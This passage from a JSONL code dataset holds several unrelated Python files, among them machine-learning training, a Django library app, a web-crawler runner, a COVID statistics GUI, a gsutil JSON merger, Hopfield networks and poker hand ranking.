kset['test']\n # generate a print\n print('------------------------------------------------------------------------')\n print(f'Training for fold {fold_no} ...')\n # running models\n histories[model_key] = models[model_key].fit(x[train], y[train],\n batch_size = batch_size,\n steps_per_epoch = steps_per_epoch,\n epochs = max_epochs,\n validation_data = (x[test],y[test]),\n callbacks = get_callbacks(),\n verbose = verbosity,\n workers = workers,\n use_multiprocessing = use_multiprocessing)\n # generate generalization metrics\n if holdout!= None:\n hscore = models[model_key].evaluate(holdout[0], holdout[1], verbose=0)\n print(f'Holdout score for fold {fold_no}: {models[model_key].loss}: {hscore}')\n holdoutscores.append(hscore)\n # increase fold number\n fold_no = fold_no + 1\n \n # plot results\n if plot_results==True: graph(histories, tight_layout=True, holdoutscores=holdoutscores)\n\n # save trained models\n if save_models_afte_training==True: model_saver_kfold(models)\n\n #output trained model\n return models, histories, holdoutscores\n\ndef main ():\n # loading train and validation sets in binary format\n train_x = np.load('train_x.npy')\n holdout_x = np.load('holdout_x.npy')\n train_y = np.load('train_y.npy')\n holdout_y = np.load('holdout_y.npy')\n # run kfolds\n models, histories, holdoutscores = model_kfold(train_x, train_y, holdout=[holdout_x,holdout_y])\n pass\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"kfold_model.py","file_name":"kfold_model.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"61400678","text":"# Authur: Xiukun Hunag\r\n# Date: Mar., 2016\r\nimport os\r\nimport json\r\nvideo_dic ={}\r\nif os.path.isdir('./folder_of_change_name_inf')==False:\r\n os.mkdir('./folder_of_change_name_inf')\r\nfor folder in os.listdir('./folder_of_video'): \r\n i =1\r\n video_dic[folder] =[]\r\n os.chdir('./folder_of_video/'+folder)\r\n for video in os.listdir('.'):\r\n i =str(i)\r\n name =i.rjust(6,'0') +'.mp4'\r\n video_dic[folder].append(video+'!!!!!!'+name)\r\n os.rename(video ,name)\r\n i =int(i)\r\n i =i +1\r\n os.chdir('..')\r\n os.chdir('..')\r\n video_dic_json =json.dumps(video_dic[folder])\r\n filename = './folder_of_change_name_inf/' +folder +'.json'\r\n with open(filename ,'w') as f:\r\n f.write(video_dic_json)\r\n","sub_path":"change_video_name.py","file_name":"change_video_name.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469283436","text":"import matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\n\nimg1 = Image.open('Flair/0001_090.png')\nimg1_mat = np.array(img1, dtype=np.float)\nimg2 = Image.open('T1/0001_090.png')\nimg2_mat = np.array(img2, dtype=np.float)\n\nplt.imshow(img1_mat, cmap='gray')\nplt.show()\n\nimg1_prob = img1_mat/ 127.0 -1\nimg2_prob = img2_mat/ 127.0 -1\n\nmat_index = np.int32(img1_mat / cell_range)\nmat_feature = img2_prob - img1_prob\n\ncell_range = 16\nbins_num = 256 / 16\nbins_idx = np.zeros(bins_num)\nfor idx in range(bins_num):\n num = np.sum(mat_index == idx)\n if num >0:\n bins_idx[idx] = np.mean(mat_feature[mat_index == idx])\n\nplt.plot(bins_idx)\nplt.savefig('tmp.png')\n","sub_path":"analysis_plot.py","file_name":"analysis_plot.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"366885654","text":"from scrapy.utils.url import urljoin_rfc\n\ndef link(link_sel, base_url=\"\"):\n \"\"\"\n takes a link selector and returns a tuple of (text, url)\n base_url will be used to construct absolute urls from relative ones if\n provided\n \"\"\"\n txt = link_sel.select(\"text()\").extract()[0].strip()\n url = link_sel.select(\"@href\").extract()[0]\n if base_url:\n url = urljoin_rfc(base_url, url)\n return (txt, url)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94217066","text":"from django.views.generic import TemplateView, FormView\n\nfrom .models import DeliveryType\nfrom .forms import LetterForm, LetterOnlyDeliveryForm\n\n\nclass TypeListView(TemplateView):\n template_name = \"delivery_letter/type_list.html\"\n\n def get_context_data(self, **kwargs):\n kwargs['delivery_type_list'] = DeliveryType.objects.all()\n return super().get_context_data(**kwargs)\n\n\nclass LetterBaseFormView(FormView):\n template_name = 'delivery_letter/delivery.html'\n success_url = '/'\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\nclass LetterFormView(LetterBaseFormView):\n form_class = LetterForm\n\n\nclass LetterOnlyDeliveryFormView(LetterBaseFormView):\n form_class = LetterOnlyDeliveryForm\n\n\n\n","sub_path":"direct_mail/services/delivery_letter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"653295964","text":"\nif __name__ == \"__main__\":\n\timport logSetup\n\tlogSetup.initLogging()\n\nimport WebMirror.rules\nimport WebMirror.util.urlFuncs as urlFuncs\nimport time\nimport multiprocessing\nimport signal\nimport logging\nimport traceback\nimport WebMirror.Engine\nimport runStatus\nimport queue\nimport sqlalchemy.exc\nimport WebMirror.database as db\n\nimport WebMirror.OutputFilters.AmqpInterface\nimport config\nimport os.path\n\n\nfrom sqlalchemy.sql import text\nfrom sqlalchemy.sql import func\nimport WebMirror.database as db\n\nPROCESSES = 24\n# PROCESSES = 16\n# PROCESSES = 4\n# PROCESSES = 2\n# PROCESSES = 1\n\n# For synchronizing saving cookies to disk\ncookie_lock = multiprocessing.Lock()\njob_get_lock = multiprocessing.Lock()\n\ndef halt_exc(x, y):\n\tif runStatus.run_state.value == 0:\n\t\tprint(\"Raising Keyboard Interrupt\")\n\t\traise KeyboardInterrupt\n\nclass RunInstance(object):\n\tdef __init__(self, num, rules, response_queue, nosig=True):\n\t\tprint(\"RunInstance %s init!\" % num)\n\t\tif nosig:\n\t\t\tsignal.signal(signal.SIGINT, signal.SIG_IGN)\n\t\tself.num = num\n\t\tself.log = logging.getLogger(\"Main.Text.Web\")\n\n\t\tself.archiver = WebMirror.Engine.SiteArchiver(cookie_lock, job_get_lock=job_get_lock, response_queue=response_queue)\n\t\tprint(\"RunInstance %s MOAR init!\" % num)\n\n\n\tdef do_task(self):\n\t\tself.archiver.taskProcess()\n\n\tdef go(self):\n\t\tself.log.info(\"RunInstance starting!\")\n\t\tloop = 0\n\t\twhile 1:\n\t\t\tif runStatus.run_state.value == 1:\n\t\t\t\tself.do_task()\n\t\t\telse:\n\t\t\t\tself.log.info(\"Thread %s exiting.\", self.num)\n\t\t\t\tbreak\n\t\t\tloop += 1\n\n\t\t\tif loop == 15:\n\t\t\t\tloop = 0\n\t\t\t\tself.log.info(\"Thread %s awake. Runstate: %s\", self.num, runStatus.run_state.value)\n\n\n\n\n\n\t@classmethod\n\tdef run(cls, num, rules, response_queue, nosig=True):\n\t\tprint(\"Running!\")\n\t\ttry:\n\t\t\trun = cls(num, rules, response_queue, nosig)\n\t\t\tprint(\"Class instantiated: \", run)\n\t\t\trun.go()\n\t\texcept Exception:\n\t\t\tprint()\n\t\t\tprint(\"Exception in sub-process!\")\n\t\t\ttraceback.print_exc()\n\ndef initializeStartUrls(rules):\n\tprint(\"Initializing all start URLs in the database\")\n\n\tfor ruleset in [rset for rset in rules if rset['starturls']]:\n\t\tfor starturl in ruleset['starturls']:\n\t\t\thave = db.get_session().query(db.WebPages) \\\n\t\t\t\t.filter(db.WebPages.url == starturl) \\\n\t\t\t\t.count()\n\t\t\tif not have:\n\t\t\t\tnetloc = urlFuncs.getNetLoc(starturl)\n\t\t\t\tnew = db.WebPages(\n\t\t\t\t\t\turl = starturl,\n\t\t\t\t\t\tstarturl = starturl,\n\t\t\t\t\t\tnetloc = netloc,\n\t\t\t\t\t\ttype = ruleset['type'],\n\t\t\t\t\t\tpriority = db.DB_IDLE_PRIORITY,\n\t\t\t\t\t\tdistance = db.DB_DEFAULT_DIST,\n\t\t\t\t\t\tnormal_fetch_mode = ruleset['normal_fetch_mode'],\n\t\t\t\t\t)\n\t\t\t\tprint(\"Missing start-url for address: '{}'\".format(starturl))\n\t\t\t\tdb.get_session().add(new)\n\t\tdb.get_session().commit()\n\n\ndef resetInProgress():\n\tprint(\"Resetting any stalled downloads from the previous session.\")\n\n\t# db.get_session().begin()\n\tdb.get_session().query(db.WebPages) \\\n\t\t.filter((db.WebPages.state == \"fetching\") | (db.WebPages.state == \"processing\")) \\\n\t\t.update({db.WebPages.state : \"new\"})\n\tdb.get_session().commit()\n\n\nclass UpdateAggregator(object):\n\tdef __init__(self, msg_queue):\n\t\tself.queue = msg_queue\n\t\tself.log = logging.getLogger(\"Main.Agg.Manager\")\n\n\t\tamqp_settings = {\n\t\t\t\"RABBIT_LOGIN\" : config.C_RABBIT_LOGIN,\n\t\t\t\"RABBIT_PASWD\" : config.C_RABBIT_PASWD,\n\t\t\t\"RABBIT_SRVER\" : config.C_RABBIT_SRVER,\n\t\t\t\"RABBIT_VHOST\" : config.C_RABBIT_VHOST,\n\t\t}\n\n\t\tif config.C_DO_RABBIT:\n\t\t\tself._amqpint = WebMirror.OutputFilters.AmqpInterface.RabbitQueueHandler(amqp_settings)\n\n\t\tself.seen = {}\n\n\t\tself.links = 0\n\t\tself.amqpUpdateCount = 0\n\t\tself.deathCounter = 0\n\n\t\tself.batched_links = []\n\n\tdef do_amqp(self, pkt):\n\t\tself.amqpUpdateCount += 1\n\n\t\tif self.amqpUpdateCount % 50 == 0:\n\t\t\tself.log.info(\"Transmitted AMQP messages: %s\", self.amqpUpdateCount)\n\t\tself._amqpint.put_item(pkt)\n\n\n\n\n\tdef do_link_batch_update(self):\n\t\tif not self.batched_links:\n\t\t\treturn\n\n\t\tself.log.info(\"Inserting %s items into DB in batch.\", len(self.batched_links))\n\t\twhile 1:\n\t\t\ttry:\n\n\t\t\t\tcmd = text(\"\"\"\n\t\t\t\t\t\tINSERT INTO\n\t\t\t\t\t\t\tweb_pages\n\t\t\t\t\t\t\t(url, starturl, netloc, distance, is_text, priority, type, fetchtime, state)\n\t\t\t\t\t\tVALUES\n\t\t\t\t\t\t\t(:url, :starturl, :netloc, :distance, :is_text, :priority, :type, :fetchtime, :state)\n\t\t\t\t\t\tON CONFLICT DO NOTHING\n\t\t\t\t\t\t\"\"\")\n\t\t\t\tfor paramset in self.batched_links:\n\t\t\t\t\tdb.get_session().execute(cmd, params=paramset)\n\t\t\t\tdb.get_session().commit()\n\t\t\t\tself.batched_links = []\n\t\t\t\tbreak\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tself.log.info(\"Keyboard Interrupt?\")\n\t\t\t\tdb.get_session().rollback()\n\t\t\texcept sqlalchemy.exc.InternalError:\n\t\t\t\tself.log.info(\"Transaction error. Retrying.\")\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tdb.get_session().rollback()\n\t\t\texcept sqlalchemy.exc.OperationalError:\n\t\t\t\tself.log.info(\"Transaction error. Retrying.\")\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tdb.get_session().rollback()\n\n\n\tdef do_link(self, linkdict):\n\t\t# print(\"Link upsert!\")\n\t\t# Linkdict structure\n\t\t# new = {\n\t\t# \t'url' : link,\n\t\t# \t'starturl' : job.starturl,\n\t\t# \t'netloc' : start,\n\t\t# \t'distance' : job.distance+1,\n\t\t# \t'is_text' : istext,\n\t\t# \t'priority' : job.priority,\n\t\t# \t'type' : job.type,\n\t\t# \t'state' : \"new\",\n\t\t# \t'fetchtime' : datetime.datetime.now(),\n\t\t# }\n\n\t\tassert 'url' in linkdict\n\t\tassert 'starturl' in linkdict\n\t\tassert 'netloc' in linkdict\n\t\tassert 'distance' in linkdict\n\t\tassert 'is_text' in linkdict\n\t\tassert 'priority' in linkdict\n\t\tassert 'type' in linkdict\n\t\tassert 'state' in linkdict\n\t\tassert 'fetchtime' in linkdict\n\n\t\turl = linkdict['url']\n\n\t\tif not url in self.seen:\n\t\t\t# Fucking huzzah for ON CONFLICT!\n\t\t\tself.batched_links.append(linkdict)\n\t\t\tself.seen[url] = True\n\n\t\t\tif len(self.batched_links) > 100:\n\t\t\t\tself.do_link_batch_update()\n\n\t\t# else:\n\t\t# \tprint(\"Old item: %s\", linkdict)\n\n\tdef do_task(self):\n\n\t\ttarget, value = self.queue.get_nowait()\n\n\t\tif (self.links % 50) == 0:\n\t\t\tself.log.info(\"Aggregator active. Total cached URLs: %s, Items in processing queue: %s, transmitted release messages: %s.\", len(self.seen), self.queue.qsize(), self.amqpUpdateCount)\n\n\t\tself.links += 1\n\n\t\tif target == \"amqp_msg\":\n\t\t\tif config.C_DO_RABBIT:\n\t\t\t\tself.do_amqp(value)\n\t\telif target == \"new_link\":\n\t\t\tself.do_link(value)\n\t\telse:\n\t\t\tprint(\"Todo\", target, value)\n\n\tdef run(self):\n\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tself.do_task()\n\t\t\t\tself.deathCounter = 0\n\t\t\texcept queue.Empty:\n\t\t\t\tif runStatus.agg_run_state.value == 1:\n\t\t\t\t\t# Fffffuuuuu time.sleep barfs on KeyboardInterrupt\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\tself.do_link_batch_update()\n\t\t\t\t\texcept KeyboardInterrupt:\n\t\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tself.do_link_batch_update()\n\t\t\t\t\tself.deathCounter += 1\n\t\t\t\t\ttime.sleep(0.1)\n\t\t\t\t\tif self.deathCounter > 5:\n\t\t\t\t\t\tself.log.info(\"Aggregator thread exiting.\")\n\t\t\t\t\t\tbreak\n\t\t\texcept Exception:\n\t\t\t\tself.log.error(\"Exception in aggregator!\")\n\t\t\t\tfor line in traceback.format_exc():\n\t\t\t\t\tself.log.error(line.rstrip())\n\nclass Crawler(object):\n\tdef __init__(self):\n\t\tself.log = logging.getLogger(\"Main.Text.Manager\")\n\t\tself.rules = WebMirror.rules.load_rules()\n\t\tself.agg_queue = multiprocessing.Queue()\n\n\tdef start_aggregator(self):\n\n\t\tagg = UpdateAggregator(self.agg_queue)\n\t\tself.agg_proc = multiprocessing.Process(target=agg.run)\n\t\tself.agg_proc.start()\n\n\tdef join_aggregator(self):\n\n\t\tself.log.info(\"Asking Aggregator process to stop.\")\n\t\trunStatus.agg_run_state.value = 0\n\t\tself.agg_proc.join(0)\n\t\tself.log.info(\"Aggregator joined.\")\n\n\tdef run(self):\n\n\t\ttasks =[]\n\t\tcnt = 0\n\t\tprocno = 0\n\n\t\tself.start_aggregator()\n\n\t\tif PROCESSES == 1:\n\t\t\tself.log.info(\"Running in single process mode!\")\n\t\t\ttry:\n\t\t\t\tRunInstance.run(procno, self.rules, self.agg_queue, nosig=False)\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\trunStatus.run_state.value = 0\n\n\n\t\telif PROCESSES < 1:\n\t\t\tself.log.error(\"Wat?\")\n\t\telif PROCESSES > 1:\n\t\t\ttry:\n\t\t\t\twhile runStatus.run_state.value:\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tcnt += 1\n\t\t\t\t\tif cnt == 10:\n\t\t\t\t\t\tcnt = 0\n\t\t\t\t\t\tliving = sum([task.is_alive() for task in tasks])\n\t\t\t\t\t\tfor dummy_x in range(PROCESSES - living):\n\t\t\t\t\t\t\tself.log.warning(\"Insufficent living child threads! Creating another thread with number %s\", procno)\n\t\t\t\t\t\t\tproc = multiprocessing.Process(target=RunInstance.run, args=(procno, self.rules, self.agg_queue))\n\t\t\t\t\t\t\ttasks.append(proc)\n\t\t\t\t\t\t\tproc.start()\n\t\t\t\t\t\t\tprocno += 1\n\t\t\t\t\t\tself.log.info(\"Living processes: %s\", living)\n\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\trunStatus.run_state.value = 0\n\n\t\t\tself.log.info(\"Crawler allowing ctrl+c to propagate.\")\n\t\t\ttime.sleep(1)\n\t\t\trunStatus.run_state.value = 0\n\n\n\t\t\tself.log.info(\"Crawler waiting on executor to complete: Runstate = %s\", runStatus.run_state.value)\n\t\t\twhile 1:\n\t\t\t\tliving = sum([task.is_alive() for task in tasks])\n\t\t\t\t[task.join(3.0/(living+1)) for task in tasks]\n\t\t\t\tself.log.info(\"Living processes: '%s'\", living)\n\t\t\t\tif living == 0:\n\t\t\t\t\tbreak\n\n\n\n\n\t\t\tself.log.info(\"All processes halted.\")\n\t\tself.join_aggregator()\n\n\nif __name__ == \"__main__\":\n\trunner = Crawler()\n\trunner.run()\n\tprint(runner)\n\n","sub_path":"WebMirror/Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":8936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"199274882","text":"import tkinter as tk\r\nfrom tkinter import ttk, messagebox\r\nimport requests\r\nimport socket\r\nimport os\r\n\r\n\r\ndef is_connected():\r\n try:\r\n socket.create_connection((\"www.google.com\", 80))\r\n return 1\r\n except OSError:\r\n return 0\r\n\r\n\r\ndef show_entry_fields():\r\n try:\r\n if(is_connected()):\r\n country = e1.get()\r\n request = requests.get(\r\n f\"https://disease.sh/v3/covid-19/countries/{country.lower()}\")\r\n country = request.json()['country']\r\n\r\n def operation(items):\r\n return \"+\" if request.json()[items] != 0 else \"\"\r\n print(\r\n f\"https://disease.sh/v3/covid-19/countries/{country.capitalize()}\")\r\n window = tk.Tk()\r\n window.title(f\"Covid-19 {country}\")\r\n window.geometry('1000x500')\r\n lbl = ttk.Label(\r\n window, text=f\"New cases today : {operation('todayCases')}{request.json()['todayCases']:,d}\")\r\n lbl.pack()\r\n lbl2 = ttk.Label(\r\n window, text=f\"New recovered today : {operation('todayRecovered')}{request.json()['todayRecovered']:,d}\")\r\n lbl2.pack()\r\n lbl3 = ttk.Label(\r\n window, text=f\"New death today : {operation('todayDeaths')}{request.json()['todayDeaths']:,d}\")\r\n lbl3.pack()\r\n lbl4 = ttk.Label(\r\n window, text=f\"Total Cases : {request.json()['cases']:,d}\")\r\n lbl4.pack()\r\n lbl5 = ttk.Label(\r\n window, text=f\"Total Recovered : {request.json()['recovered']:,d}\")\r\n lbl5.pack()\r\n lbl6 = ttk.Label(\r\n window, text=f\"Total Death : {request.json()['deaths']:,d}\")\r\n lbl6.pack()\r\n lbl7 = ttk.Label(\r\n window, text=f\"Active Cases : {request.json()['active']:,d}\")\r\n lbl7.pack()\r\n lbl8 = ttk.Label(\r\n window, text=f\"Critical cases : {request.json()['critical']:,d}\")\r\n lbl8.pack()\r\n master.destroy()\r\n else:\r\n messagebox.showerror(\r\n \"Error\", \"An error occurred in the internet connection\")\r\n except:\r\n messagebox.showerror(\r\n \"Error\", \"An error occurred getting the information. Check Your Country\")\r\n\r\n\r\nmaster = tk.Tk()\r\nmaster.title(\"Covid-19\")\r\nmaster.geometry('1000x500')\r\ntk.Label(master, text=\"Country\", font='Helvetica 50 bold').pack()\r\ne1 = tk.Entry(master)\r\ne1.pack()\r\ntk.Button(master, text='Show', command=show_entry_fields).pack()\r\nl1 = tk.Label(master, text=\"Coded By fagun\")\r\nl1.pack()\r\ntk.mainloop()","sub_path":"covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525982711","text":"\nfrom django.shortcuts import render\n\n# # from django.shortcuts import get_object_or_404\n# from django.http import HttpResponseRedirect\n# from django.urls import reverse\nimport datetime\nfrom django.contrib.auth.decorators import permission_required\n\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.urls import reverse_lazy\nfrom .models import Book, Author, BookInstance\nfrom django.views import generic\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\n\ndef index(request):\n \"\"\"View function for home page of site.\"\"\"\n # Generate counts of some of the main objects\n num_books = Book.objects.all().count()\n num_instances = BookInstance.objects.all().count()\n # # Available copies of books\n num_instances_available = \\\n BookInstance.objects.filter(status__exact='a').count()\n num_authors = Author.objects.count() # The 'all()' is implied by default.\n\n # Number of visits to this view, as counted in the session variable.\n # num_visits = request.session.get('num_visits', 0)\n # request.session['num_visits'] = num_visits + 1\n\n # Render the HTML template index.html\n # with the data in the context variable.\n return render(request,'index.html',context={\n 'num_books': num_books,\n 'num_instances': num_instances,\n 'num_instances_available': num_instances_available,\n 'num_authors': num_authors, }\n )\n\n\nclass BookListView(generic.ListView):\n \"\"\"Generic class-based view for a list of books.\"\"\"\n model = Book\n paginate_by = 2\n\n\nclass BookDetailView(generic.DetailView):\n \"\"\"Generic class-based detail view for a book.\"\"\"\n model = Book\n\n\nclass AuthorListView(generic.ListView):\n \"\"\"Generic class-based list view for a list of authors.\"\"\"\n model = Author\n paginate_by = 2\n\n\nclass AuthorDetailView(generic.DetailView):\n \"\"\"Generic class-based detail view for an author.\"\"\"\n model = Author\n\n@permission_required('catalog.can_mark_returned')\nclass LoanedBooksAllListView(PermissionRequiredMixin, generic.ListView):\n # Generic class-based view listing all books\n # on loan. Only visible to users with can_mark_returned permission.\"\"\"\n model = BookInstance\n permission_required = 'catalog.can_mark_returned'\n template_name = 'catalog/bookinstance_list_borrowed_all.html'\n paginate_by = 2\n\n\nclass AuthorCreate(PermissionRequiredMixin, CreateView):\n model = Author\n fields = '__all__'\n initial = {'date_of_death': '05/01/2018'}\n permission_required = 'catalog.can_mark_returned'\n\n\nclass AuthorUpdate(PermissionRequiredMixin, UpdateView):\n model = Author\n fields = ['first_name', 'last_name', 'date_of_birth', 'date_of_death']\n permission_required = 'catalog.can_mark_returned'\n\n\nclass AuthorDelete(PermissionRequiredMixin, DeleteView):\n model = Author\n success_url = reverse_lazy('authors')\n permission_required = 'catalog.can_mark_returned'\n\n\n# Classes created for the forms challenge\nclass BookCreate(PermissionRequiredMixin, CreateView):\n model = Book\n fields = '__all__'\n permission_required = 'catalog.can_mark_returned'\n\n\nclass BookUpdate(PermissionRequiredMixin, UpdateView):\n model = Book\n fields = '__all__'\n permission_required = 'catalog.can_mark_returned'\n\n\nclass BookDelete(PermissionRequiredMixin, DeleteView):\n model = Book\n success_url = reverse_lazy('books')\n permission_required = 'catalog.can_mark_returned'\n","sub_path":"locallib/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455646682","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ncity_by_zip.py: returns the cities listed under a given zipcode\r\n\r\n@author: Jonah\r\n\"\"\"\r\n\r\nfrom uszipcode import SearchEngine\r\n\r\nsearch = SearchEngine(simple_zipcode=False)\r\n\r\ndef return_cities():\r\n zipcode = input(\"Please enter a zipcode: \")\r\n result = search.by_zipcode(zipcode)\r\n for city in result.common_city_list:\r\n print(\"\\n\"+city)\r\n\r\nif __name__ == \"__main__\":\r\n return_cities()\r\n\r\n","sub_path":"city_by_zip.py","file_name":"city_by_zip.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"445482555","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport shlex\nimport json\nimport os\n\nfrom utils import progressBar,mapcount\n\n\ndef localize_files(gpath,file_list):\n \"\"\"\n Get list of jsons to merge\n \"\"\"\n with open(file_list,'wt') as f:\n if not gpath.endswith('/'): gpath += '/'\n gpath = (f\"{gpath}**/*json\")\n command = f\"gsutil ls {gpath}\"\n print(command)\n subprocess.call(shlex.split(command),stdout = f)\n \ndef merge_files(out_json,file_list):\n \"\"\"\n Localizes each json as tmp file and reads it into memory\n \"\"\"\n tmp_json = os.path.join(os.path.dirname(file_list),'tmp.json')\n json_list = []\n jsons = mapcount(file_list)\n \n with open(file_list) as i:\n for idx,line in enumerate(i):\n progressBar(idx,jsons)\n gfile = line.strip()\n command = f\"gsutil cp {gfile} {tmp_json}\"\n subprocess.call(shlex.split(command),stdout =subprocess.DEVNULL,stderr = subprocess.DEVNULL)\n\n with open(tmp_json) as f: j = json.load(f) \n json_list.append(j)\n\n print('\\ndone.')\n with open(out_json,'wt') as out:\n json.dump(json_list,out,indent = 2)\n\n os.remove(tmp_json)\n os.remove(file_list)\n \ndef run():\n parser = argparse.ArgumentParser(description=\"Merge jsons in one files\")\n parser.add_argument('gpath', type=str, help='Gsutil path ')\n parser.add_argument('out_json', type=str, help='Local path of final json')\n args = parser.parse_args()\n\n print(args)\n out_path = os.path.dirname(args.out_json)\n file_list = f\"{os.path.join(out_path,'json_list.txt')}\" \n localize_files(args.gpath,file_list)\n merge_files(args.out_json,file_list)\n\n \nif __name__ == \"__main__\":\n\n run()\n","sub_path":"scripts/merge_jsons.py","file_name":"merge_jsons.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603887447","text":"import numpy as np\r\nimport random\r\nimport math\r\n\r\n# ヘッブ則\r\ndef hebbLearn(patterns):\r\n length = patterns.shape[1]\r\n weights = np.zeros((length, length))\r\n for pattern in patterns:\r\n for i in range(0, length - 1):\r\n for j in range(i + 1, length):\r\n weights[i][j] += pattern[i] * pattern[j]\r\n for i in range(0, length - 1):\r\n for j in range(i + 1, length):\r\n weights[i][j] /= length\r\n weights[j][i] = weights[i][j]\r\n return weights\r\n\r\n# 学習した重みを使ってパタ-ンを想起する\r\ndef associate(input_state, weights, iterateNum):\r\n length = len(input_state)\r\n state = input_state.copy()\r\n for i in range(0, iterateNum):\r\n index = random.randint(0, length - 1)\r\n a = sum([weights[index][i] * state[i] for i in range(0, length)])\r\n state[index] = threshold(a)\r\n return state\r\n\r\n# 可視化のためにn^2次元ベクトルをn*n行列に変換する\r\ndef deserialize(data):\r\n size = round(math.sqrt(len(data)))\r\n matrix = np.zeros((size, size), dtype=int)\r\n for i in range(0, size):\r\n matrix[i] = data[size * i : size * (i + 1)]\r\n return matrix\r\n\r\n# 2データ間の距離\r\ndef distance(data1, data2):\r\n return sum([abs(data1[i] - data2[i]) for i in range(0, len(data1))]) / 2\r\n","sub_path":"hopfield/jupyter_notebook/.ipynb_checkpoints/HopfieldNetWorks.py","file_name":"HopfieldNetWorks.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"138949808","text":"# -----------\n# User Instructions\n#\n# Modify the hand_rank function so that it returns the\n# correct output for the remaining hand types, which are:\n# full house, flush, straight, three of a kind, two pair,\n# pair, and high card hands.\n#\n# Do this by completing each return statement below.\n#\n# You may assume the following behavior of each function:\n#\n# straight(ranks): returns True if the hand is a straight.\n# flush(hand): returns True if the hand is a flush.\n# kind(n, ranks): returns the first rank that the hand has\n# exactly n of. For A hand with 4 sevens\n# this function would return 7.\n# two_pair(ranks): if there is a two pair, this function\n# returns their corresponding ranks as a\n# tuple. For example, a hand with 2 twos\n# and 2 fours would cause this function\n# to return (4, 2).\n# card_ranks(hand) returns an ORDERED tuple of the ranks\n# in a hand (where the order goes from\n# highest to lowest rank).\n#\n# Since we are assuming that some functions are already\n# written, this code will not RUN. Clicking SUBMIT will\n# tell you if you are correct.\n\n# Lesson1 - chapter 16\n# -----------\n# User Instructions\n#\n# Modify the test() function to include three new test cases.\n# These should assert that card_ranks gives the appropriate\n# output for the given straight flush, four of a kind, and\n# full house.\n#\n# For example, calling card_ranks on sf should output\n# [10, 9, 8, 7, 6]\n#\n# Since the program is still incomplete, clicking RUN won't do\n# anything, but clicking SUBMIT will let you know if you\n# have gotten the problem right.\n\n# Lesson1 - chapter 16\n# Modify the card_ranks() function so that cards with\n# rank of ten, jack, queen, king, or ace (T, J, Q, K, A)\n# are handled correctly. Do this by mapping 'T' to 10,\n# 'J' to 11, etc...\n\n# my solution\n\n\nimport random # this will be a useful library for shuffling\n\n\ndef poker(hands):\n \"Return the best hand: poker([hand,...]) => hand\"\n return allmax(hands, k=hand_rank)\n\n\ndef allmax(iterable, k=None):\n \"Return a list of all items equal to the max of the iterable.\"\n k = k or (lambda x: x)\n return [i for i in iterable if k(i) == k(max(iterable, key=k))]\n\n\ndef hand_rank_old(hand):\n ranks = card_ranks(hand)\n if straight(ranks) and flush(hand): # straight flush\n return (8, max(ranks))\n elif kind(4, ranks): # 4 of a kind\n return (7, kind(4, ranks), kind(1, ranks))\n elif kind(3, ranks) and kind(2, ranks): # full house\n return (6, kind(3, ranks), kind(2, ranks))\n elif flush(hand): # flush\n return (5, ranks)\n elif straight(ranks): # straight\n return (4, max(ranks))\n elif kind(3, ranks): # 3 of a kind\n return (3, kind(3, ranks), ranks)\n elif two_pair(ranks): # 2 pair\n return (2, two_pair(ranks), ranks)\n elif kind(2, ranks): # kind\n return (1, kind(2, ranks), ranks)\n else: # high card\n return (0, ranks)\n\n# %% new hand_rank\n\n\ndef hand_rank_better(hand):\n \" counts is the count of each rank; ranks lists corresponding ranks\"\n # counts is the count of each rank; ranks lists corresponding card_ranks\n # '7 T 7 9 7' --> counts = (3,1,1); ranks = (7, 10 , 9)\n groups = group(['--23456789TJQKA'.index(r) for r, s in hand])\n counts, ranks = unzip(groups)\n if ranks == (14, 5, 4, 3, 2):\n ranks = (5, 4, 3, 2, 1)\n straight = len(ranks) == 5 and max(ranks) - min(ranks) == 4\n flush = len(set([s for r, s in hand])) == 1\n return (9 if (5,) == counts else\n 8 if straight and flush else\n 7 if (4, 1) == counts else\n 6 if (3, 2) == counts else\n 5 if flush else\n 4 if straight else\n 3 if (3, 1, 1) else\n 2 if (2, 2, 1) else\n 1 if (2, 